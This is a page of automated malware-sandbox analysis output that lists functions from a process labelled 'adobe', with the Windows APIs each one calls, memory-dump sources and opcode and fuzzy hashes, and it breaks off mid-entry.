Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e0a05393256a030617915cb02bb366046450c828efeaf3737aa21a8b6ed6a024
Instruction ID: 464c3163959a56de3a478469cd48075466f4fc364b8b9adb6b3df969ae86e345
Opcode Fuzzy Hash: e0a05393256a030617915cb02bb366046450c828efeaf3737aa21a8b6ed6a024
Instruction Fuzzy Hash: 7C2122B1D002099FDB54DF9AC844BEEFBF5BB88710F10842AE418A7250D775A944CFA1

Function 017CEE10 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 017CEE7F

Memory Dump Source

Source File: 00000005.00000002.2364135578.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17c0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ba4784bc1e10b2982172edf4173d8d47b6997675241a27c8c440d6988d773118
Instruction ID: 8c563ccbea7e416b8961b740fc4b3a6ae8136f1645a0c2b27033aebcf4e18895
Opcode Fuzzy Hash: ba4784bc1e10b2982172edf4173d8d47b6997675241a27c8c440d6988d773118
Instruction Fuzzy Hash: 411117B1C006599FDB10DF9AC444BDEFBF4AF48720F15822AD918B7240D778A944CFA5

Function 017CEE18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 017CEE7F

Memory Dump Source

Source File: 00000005.00000002.2364135578.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_17c0000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e4c1faec59de6e4ac08a782c3199535fdf15ad8ddf88db48062df2a3883e6f7d
Instruction ID: 36ac65dd81ead162e7ea69553a750cb808244188fd896957e811c1358abac0d0
Opcode Fuzzy Hash: e4c1faec59de6e4ac08a782c3199535fdf15ad8ddf88db48062df2a3883e6f7d
Instruction Fuzzy Hash: 70111FB1C0065A9BDB10CFAAC844BDEFBF4AF48720F15812AD918B7240D778A944CFA5

Function 06EE194A Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06EE19B6

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b3fb9fafdcabad024d2c31ab61e33ae6a33ae02070370c2c45abb2d3cb82d7d5
Instruction ID: f8807bb418407ede300b9937c46863bd229af3f84d067e2921de926a3c5ce11f
Opcode Fuzzy Hash: b3fb9fafdcabad024d2c31ab61e33ae6a33ae02070370c2c45abb2d3cb82d7d5
Instruction Fuzzy Hash: 2011FDB5C007498FDB20DF9AD844ADEFBF4AB88714F10842AD869B7310C379A585CFA5

Function 06EE1950 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 06EE19B6

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6522e73ff2b7844e7dd643778a7b91c0b26dae7eebab85512d29ede4548c8108
Instruction ID: 38f64de4589330086edf56c01e8bcb3f26570f3f2ac21bd92a45d25c9f10f1dd
Opcode Fuzzy Hash: 6522e73ff2b7844e7dd643778a7b91c0b26dae7eebab85512d29ede4548c8108
Instruction Fuzzy Hash: 1E110FB5C007498FDB10CF9AC844ADEFBF4AB88714F10841AD858B7300C379A585CFA5

Function 06EE64BC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06EE7A95), ref: 06EE7B1F

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 3a876f7efe3ef349f4a5c6abfe5de48e3adfc4e037b2a4c85889ca668b6c9a9b
Instruction ID: 1afd015f73cdc8c6fa5266a7fd8502a660d26cf8bd5fbd9bef30c92bc77ca285
Opcode Fuzzy Hash: 3a876f7efe3ef349f4a5c6abfe5de48e3adfc4e037b2a4c85889ca668b6c9a9b
Instruction Fuzzy Hash: 971122B0900349DFDB60DF9AD845B9EBBF4EB48710F208419D919A7200C374A944CFA5

Function 06EE8389 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EE83E5

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 75a0305645e56254dfa2fb953fea1f5d6f7f6f92c46106e33c14db2f51549d69
Instruction ID: 43bb4236e0f6bfd28ffb8e8d16a95fa5a8190ad219687d8ada9001e7b4c48e8c
Opcode Fuzzy Hash: 75a0305645e56254dfa2fb953fea1f5d6f7f6f92c46106e33c14db2f51549d69
Instruction Fuzzy Hash: 3B1145B4900348CFDB20CF9AD449BDEFBF4AB48310F208419E518A3300C338A944CFA5

Function 06EE7D6C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06EE83E5

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f92131fc2d45abaedb68e6a2a014e22fd5bec96e56c3a93dab8a123f902ba8b7
Instruction ID: d67adbd2fdce71d67c473ccce0a67d3640eb4c6f5bef65afe8a8f3b301bef8fa
Opcode Fuzzy Hash: f92131fc2d45abaedb68e6a2a014e22fd5bec96e56c3a93dab8a123f902ba8b7
Instruction Fuzzy Hash: 6D11F2B1904749CFDB60DF9AD849B9EFBF4EB48314F108459D519A7200C378A944CBA5

Function 06EE7AB8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06EE7A95), ref: 06EE7B1F

Memory Dump Source

Source File: 00000005.00000002.2372155682.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ee0000_adobe.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 5c92acae78a9504ab26b85dead8933ba08b27fd4deb22f53949df022b2b380c1
Instruction ID: 3148d1d3d40a46a7156029464157f30e2c2ac98c17191bb22398fdbe6bf69d9c
Opcode Fuzzy Hash: 5c92acae78a9504ab26b85dead8933ba08b27fd4deb22f53949df022b2b380c1
Instruction Fuzzy Hash: DF11F2B58003499FDB20DF9AD845BDEBBF8AB48724F208419D518A7240C774A544CFA5

Function 06EFFEE9 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

|, xrefs: 06EFFF48

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 5ebf179b843a52660e4c9816ba6780f84c449dbc3001512bd97314f5eba609e0
Instruction ID: 7155af69db9dc88c40945e40a5cb453392187ddabb7e9e1b2d83877ba97fca80
Opcode Fuzzy Hash: 5ebf179b843a52660e4c9816ba6780f84c449dbc3001512bd97314f5eba609e0
Instruction Fuzzy Hash: E4117F75F002149FDB44AB78D804B6EBBF5AF8C750F104469EA1AE73A0DB359900CB90

Function 06EFFEF8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 06EFFF48

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 9d13f05a271e89ac908a09e638399fd04420268eb333001e0b6e9d6eaee059f9
Instruction ID: 36088a728064eeeba4d7ab359075f20534b0c39659505d16c926574e8ffde3a6
Opcode Fuzzy Hash: 9d13f05a271e89ac908a09e638399fd04420268eb333001e0b6e9d6eaee059f9
Instruction Fuzzy Hash: 8D115E75F102149FDB44DB78C804BAEBBF6AF4C740F104469E60AE7390DB759900CB80

Function 06EFCEC8 Relevance: .8, Instructions: 801COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68c276b2c21ac441a8172ecbb425992b6c142dfd25dd0ed1956f219414bb983
Instruction ID: 4195688e1463196ff80080e0560fe84d7df0cfb369ac0795f58ca173790b35f3
Opcode Fuzzy Hash: a68c276b2c21ac441a8172ecbb425992b6c142dfd25dd0ed1956f219414bb983
Instruction Fuzzy Hash: 1F626330A11206CFDB55DB78E9A0A9DBBB2FF85304F218968D1069F355EB75EC46CB80

Function 06EFB5C0 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90210358b86b0c89bb7f1315ceee54557e34b0c4880b1a3a3f4cabd22c788908
Instruction ID: 82e997a55f4193fcebd447b8c294c7d805549dca49293e45069e59126ec40be6
Opcode Fuzzy Hash: 90210358b86b0c89bb7f1315ceee54557e34b0c4880b1a3a3f4cabd22c788908
Instruction Fuzzy Hash: 77028F30E2030A8FDB64DF68D4906AEB7B2FB85314F20992AE515DB385DB34EC45CB91

Function 06EFAC40 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082c60a444ed55dbffb26f66c936c081ee99a3024f376aba5b70c2d275bfbc9d
Instruction ID: c9eb89be58b4995b3c85a4fca94bcb303af58f2fe954c753198d6457c0d2dadb
Opcode Fuzzy Hash: 082c60a444ed55dbffb26f66c936c081ee99a3024f376aba5b70c2d275bfbc9d
Instruction Fuzzy Hash: 1EE16D30E2030ACFDB58DB68D8946AEB7B2FF89304F209939D5099B355DB359C45CB91

Function 06EFFB27 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a212a75cd404c1d685af6481d9f13479796140071b72b776c26b3b54ca0d10e9
Instruction ID: 5fa5802403ebc2221725761f1dd20c51db3967443338df5eec3d167b14ee98c2
Opcode Fuzzy Hash: a212a75cd404c1d685af6481d9f13479796140071b72b776c26b3b54ca0d10e9
Instruction Fuzzy Hash: BD71D431F20205DFDF649B78E8943ADB7B2EB85315F104829E20ADB394DB358C45CB91

Function 06EF90C8 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfa26cf2b4ea5b9b3265c8c4b16d557392c93de14d2b1893a2c1131d3eea660
Instruction ID: 71c5d5b377c05e4d6b93db44057a47aa28589881b69fb45d5546aeb01e658623
Opcode Fuzzy Hash: 4dfa26cf2b4ea5b9b3265c8c4b16d557392c93de14d2b1893a2c1131d3eea660
Instruction Fuzzy Hash: F8915F30B1121A8FDB54DB69E894BAE73F6FF89240F148869C50A9B345EF359C45CB90

Function 06EF6158 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090a75842ae9075d36a107bdb3f010aa294e873faadf174c4a48970374476056
Instruction ID: ec9094e2430afc4e21d46048a7dcab24e309a57e21ec5068cb0a29face7b9cb0
Opcode Fuzzy Hash: 090a75842ae9075d36a107bdb3f010aa294e873faadf174c4a48970374476056
Instruction Fuzzy Hash: B3610372F102224BDF149B7DD88465FBAEBAFC4220B144479E90EDB365DE66EC0287C1

Function 06EF4251 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7e6f0986492fb470629b9abc6bd23be5776a57fade9438acd67a8dc660028fe
Instruction ID: fc314a8ea25d2eafc2ff39c591405be6941b9b09d4f4fa56fbb3888f6fa02d1e
Opcode Fuzzy Hash: b7e6f0986492fb470629b9abc6bd23be5776a57fade9438acd67a8dc660028fe
Instruction Fuzzy Hash: F3815E30B112498FDB54DFA9D4946AEB7F3EF89304F108428D50ADB395EB34DC468B91

Function 06EF456C Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f0ff95dd8f730d85590d96a71d78dee8d93f5f36ca9471b8f1e132608e0ce6
Instruction ID: 42debc652b60e539397895e351b7615387b214f355954782b31be90b818dbd2b
Opcode Fuzzy Hash: a9f0ff95dd8f730d85590d96a71d78dee8d93f5f36ca9471b8f1e132608e0ce6
Instruction Fuzzy Hash: C9913C30E10659CBDB50DF68C890B9AB7B1FF89314F208599D549AB285EB70AA85CF90

Function 06EF4580 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e19301769bad191086cc5493cb77c968a9bb1ed9afb10f4652b52e71df8e89a
Instruction ID: 8deaa4a0a26af33e0dc32a6e18b806c007b6dc2ffde5bf4f5e9bdbc7c9dd1df6
Opcode Fuzzy Hash: 4e19301769bad191086cc5493cb77c968a9bb1ed9afb10f4652b52e71df8e89a
Instruction Fuzzy Hash: 7F911F34E1061ACBDF60DF68C890B9DB7B1FF89314F208599D549AB385DB70AA85CF90

Function 06EFEE98 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93bd4b3257d37d663fd667d1f83f5c379bdffe4560edb3d9cbd1cb76f2ae07f7
Instruction ID: a7c4e8dce6ca301a77987ba5c2f542b60aa2b6e5a83330a91fea13ffb51da066
Opcode Fuzzy Hash: 93bd4b3257d37d663fd667d1f83f5c379bdffe4560edb3d9cbd1cb76f2ae07f7
Instruction Fuzzy Hash: BC715C70A102099FDB54DFA8D990A9DBBF6FF88304F248529E105EB365EB74EC46CB50

Function 06EFEEA8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7a033eecf3755ae3c366706f3a1b3b9d6b0c725e8d627f848ab944c37111ca
Instruction ID: 162cef9c2e098942aab1e9a43c5b84b821608b00a9bf774250d8d967ca4fa348
Opcode Fuzzy Hash: 3f7a033eecf3755ae3c366706f3a1b3b9d6b0c725e8d627f848ab944c37111ca
Instruction Fuzzy Hash: 80713A70A102099FDB54DFA8D990AADBBF6FF88304F249429D105EB355EB74EC46CB50

Function 06EF4B18 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 943ddc50d04bfb781216edfddbb99cd9a5a91f1cc7235932d3aa2423ec815d2b
Instruction ID: 57e7ef54b953e66918b712cfedcc2e729b264031f96295ca39b4211e9147b988
Opcode Fuzzy Hash: 943ddc50d04bfb781216edfddbb99cd9a5a91f1cc7235932d3aa2423ec815d2b
Instruction Fuzzy Hash: 1E616E30F102199FEB549BA5D8547AEBBF6FB88300F20842AE206AB395DB754C45CF94

Function 06EFF8D9 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9015a05e13ff57e800ea05f615b9c84c90160a691ec018fb3104d2f083ae7d89
Instruction ID: a7c66f10ce9091249b48a12dc7f0d5345f5b6c495938a03cec5c28686ad27f2e
Opcode Fuzzy Hash: 9015a05e13ff57e800ea05f615b9c84c90160a691ec018fb3104d2f083ae7d89
Instruction Fuzzy Hash: 4F51E830B203059BEF605BACD8A476F367AE7C9314F20442AE60AC73D5C968CC45DBA2

Function 06EFF8E8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42857fc9b2f49c307aba7e0adca2a2250540dddb91314ecf3dcdfabbfdffe79d
Instruction ID: 8ecd06d1983609d35a82820997b45e33bad1311f2b38d1741137efbfcf19f093
Opcode Fuzzy Hash: 42857fc9b2f49c307aba7e0adca2a2250540dddb91314ecf3dcdfabbfdffe79d
Instruction Fuzzy Hash: 3A51E970B203059BFF645BACD8A476F36AAE7C9354F20442AE20AC73D5DD68CC45D7A2

Function 06EF90B9 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb7bdcdd87d9c5d8f575d6fa0b22ee625d1cb5b92fceaa4a4333c756f7a9db1
Instruction ID: 0809e86fd3595c81a39339f2bffba97bcb58189f2b4555c9b3e5c3a538724011
Opcode Fuzzy Hash: bbb7bdcdd87d9c5d8f575d6fa0b22ee625d1cb5b92fceaa4a4333c756f7a9db1
Instruction Fuzzy Hash: C3513030B112568FDB54EB78E894BAE73F6FB88240F148879C50ADB345EA359C05DB90

Function 06EF53C0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 797398975d7d40b62b9519817ce98a3930b36ee8f194ae8d6b1988d508746b3e
Instruction ID: 00343fc7bb476c4e5b4f2053e9dd58ce003b77d58c6cbd60edd8c52628a3a658
Opcode Fuzzy Hash: 797398975d7d40b62b9519817ce98a3930b36ee8f194ae8d6b1988d508746b3e
Instruction Fuzzy Hash: C2414E31E107058FDF70CFA9D880AAFBBF2FBA5214F20592AD256D7650D330A9568B91

Function 06EF4B09 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9015b00a1ebf4f684a01e166f79fa98b948ac217b4e39b02ff4c555260d7123
Instruction ID: df67768d500c873a8a9a0ce575989f3e9a3c576ea0d73ca3cfded82042b80cc7
Opcode Fuzzy Hash: f9015b00a1ebf4f684a01e166f79fa98b948ac217b4e39b02ff4c555260d7123
Instruction Fuzzy Hash: 42414D30B102599FEB55DBA5D854BAFBAF6FF88300F208529E205AB395DB758C05CF90

Function 06EFDA3D Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91593fcbbdc72f73cc31b4ad3bc4f82cf4df1dcdb8507df9c48237d2375fd028
Instruction ID: ee2a1555f823a70dbb3bffb040ac684211ffeab7ef5d4bab93307677ae4333dc
Opcode Fuzzy Hash: 91593fcbbdc72f73cc31b4ad3bc4f82cf4df1dcdb8507df9c48237d2375fd028
Instruction Fuzzy Hash: 5B41A230E1070A9FDB61DF75C89069EBFB2BF85354F104929E606DB244EB749846CB91

Function 06EF21C8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c5afe34400ed6bd8d69e58ee1f7f9434efed7b768f3f80951321b8da439da9
Instruction ID: 0379bd92b81f03ec0eb9fb9f959419972b5ec3b0788dc415cb2e95e85661e780
Opcode Fuzzy Hash: c1c5afe34400ed6bd8d69e58ee1f7f9434efed7b768f3f80951321b8da439da9
Instruction Fuzzy Hash: 3031E430B202068FDB54ABB4D4646AE77A3BF89614F10892CD602DB395EF35DD05CBA5

Function 06EF2078 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05c531171ea5c7685078a61f6f53fd1b439c7f2ee1a22e7aae6050588fc6c95
Instruction ID: b0815d315637ab03f6b86e843836c2cce44be4f4b77b402a748c0d7cbdacc0a4
Opcode Fuzzy Hash: f05c531171ea5c7685078a61f6f53fd1b439c7f2ee1a22e7aae6050588fc6c95
Instruction Fuzzy Hash: D231B430E107059FDB59CFA5D89469EB7B2FF89340F108529EA06EB340EB71AD45CB50

Function 06EF2088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53aeb4507816692fc43ce4d30dc279ac8a7b457642b57fb7a8ae2339f48decb4
Instruction ID: 3d82a88144932b244529ca7d80ed76d1b025c8d2f3525e4ce3021bc027ce070e
Opcode Fuzzy Hash: 53aeb4507816692fc43ce4d30dc279ac8a7b457642b57fb7a8ae2339f48decb4
Instruction Fuzzy Hash: 7E318330E103059FDB59CFA5D89469EB7B2FF89300F109529EA06E7350EB71AD45CB50

Function 06EF3E68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cdc2d03550bba14f88268bc3aba702c43521dddd0cf109b47549ede4c7decd8
Instruction ID: 6565632269d9c87c3b1b6a7059b96af508384ea45859ee5940d37f8720b631b6
Opcode Fuzzy Hash: 8cdc2d03550bba14f88268bc3aba702c43521dddd0cf109b47549ede4c7decd8
Instruction Fuzzy Hash: CF216675E112199FDB90DFA9E880AAEBBF1FB48710F209069EA05E7340E734DD00CB91

Function 06EF3E67 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db10d505e3b9fe7621310dfce958cf025ebbebfb949f38231592c5d5b6e187e0
Instruction ID: 6bf3ad7e92c8be6177b6f8b4750946e8fde236d4970d054028a1f6addcd78837
Opcode Fuzzy Hash: db10d505e3b9fe7621310dfce958cf025ebbebfb949f38231592c5d5b6e187e0
Instruction Fuzzy Hash: 60214871E112159FDB50DF69E880AEEBBB1FB88710F248169EA05E7340E734DD04CB90

Function 0163D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363015261.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_163d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4335fb47678bbace4604e3b0054eba72250e83650ffd9dbe5f73a04241bab1f7
Instruction ID: d7763014d8dd2135f84ac932f98012da25d7a5ddeba23a81e0c7242ab865c75e
Opcode Fuzzy Hash: 4335fb47678bbace4604e3b0054eba72250e83650ffd9dbe5f73a04241bab1f7
Instruction Fuzzy Hash: 1D210071604204EFDB11DF68D980B26FBA5FBC4714F60C56DE90A0B382C37AD847CA62

Function 06EF41B1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce74ac23fcc6d9a456a0e8a83552d8102b4d65d02a539b502485e5cebd57d86
Instruction ID: ff6f1123390a876b6e3d336ae7d4d6c999febd43c7680f05ab9b15fe473fdd06
Opcode Fuzzy Hash: 2ce74ac23fcc6d9a456a0e8a83552d8102b4d65d02a539b502485e5cebd57d86
